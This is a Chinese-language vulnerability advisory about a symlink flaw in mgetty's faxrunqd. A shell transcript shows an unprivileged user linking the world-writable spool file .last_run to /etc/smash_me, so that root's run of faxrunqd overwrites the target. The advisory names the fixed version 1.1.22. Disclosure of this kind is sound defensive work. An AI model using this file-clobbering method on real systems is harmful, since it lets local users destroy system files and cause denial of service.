受影响系统:
mgetty 1.1.21以及更低版本
- Linux redhat 6.2以及更低版本
- Linux-Mandrake 7.1 以及更低版本
- 其他使用有问题mgetty的unix系统
不受影响系统:
mgetty 1.1.22
描述:
mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务。
在执行时,该程序会在/var/spool/outgoing/目录下创建一个.last_run文件,这个目录是任何人可写的。在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在或是链接文件,因此攻击者可能覆盖任意系统文件,造成拒绝服务攻击。
<* 来源: Stan Bubrouski (satan@fastdial.net)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
建议:
mgetty 1.1.22已经解决了这个问题,您可以在下列地址下载:https://alpha.greenie.net/mgetty/
关键词标签:拒绝服务攻击,Linux,f
相关阅读
热门文章
提示dns服务错误怎么办 dns错误问题多种解决
IS-IS同时下发缺省路由出现路由环路问题的解
IBGP邻居无法建立连接问题的解决方法
对称结构承载网流量出现异常问题的故障解决
人气排行 光纤上网 路由器设置页面进不去怎么办登录SSH服务器失败问题的分析及解决无线网卡连接不上怎么办_无线网卡连接不上解决方法提示dns服务错误怎么办 dns错误问题多种解决方法本机IP设置不当造成路由异常故障分析路由设置不当 导致VPN无法访问外网无线路由器无不能上网的秘密ADSL频繁掉线如何解决?
查看所有0条评论>>